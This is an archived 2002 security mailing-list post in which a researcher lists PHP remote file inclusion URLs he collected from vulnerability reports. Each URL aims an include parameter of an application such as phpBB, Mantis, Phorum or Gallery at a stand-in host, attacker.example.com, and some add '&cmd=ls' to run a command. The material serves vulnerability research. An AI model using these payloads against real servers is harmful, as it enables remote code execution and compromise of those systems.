OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steven M. Christey (coley_at_linus.mitre.org)
Date: Sat Sep 21 2002 - 17:46:16 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I used the regular expression in my previous post to grab some
    concrete PHP-related URL's from about 4 months' worth of email, which
    includes various security mailing lists. Many of these URL's come
    from a Bugtraq post by Frog Man in June.

    /_head.php?_zb_path=http://attacker.example.com
    /achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker.example.com?
    /gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example.com
    /globals.php3?LangCookie=http://attacker.example.com
    /include/msql.php?inc_dir=http://attacker.example.com&ext=txt
    /include/mssql7.php?inc_dir=http://attacker.example.com&ext=txt
    /include/mysql.php?inc_dir=http://attacker.example.com&ext=txt
    /include/oci8.php?inc_dir=http://attacker.example.com&ext=txt
    /include/postgres.php?inc_dir=http://attacker.example.com&ext=txt
    /include/postgres65.php?inc_dir=http://attacker.example.com&ext=txt
    /install.php?phpbb_root_dir=http://attacker.example.com
    /mantis/login_page.php?g_meta_include_file=http://attacker.example.com
    /page.php?template=http://your-ip/hello.html?
    /phorum/admin/actions/del.php?include_path=http://attacker.example.com&cmd=ls
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls
    /pollensondage.inc.php?app_path=http://attacker.example.com
    /user/agora_user.php?inc_dir=http://attacker.example.com&ext=txt
    /user/ldap_example.php?inc_dir=http://attacker.example.com&ext=txt
    /userlist.php?ME=http://attacker.example.com

    - Steve

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com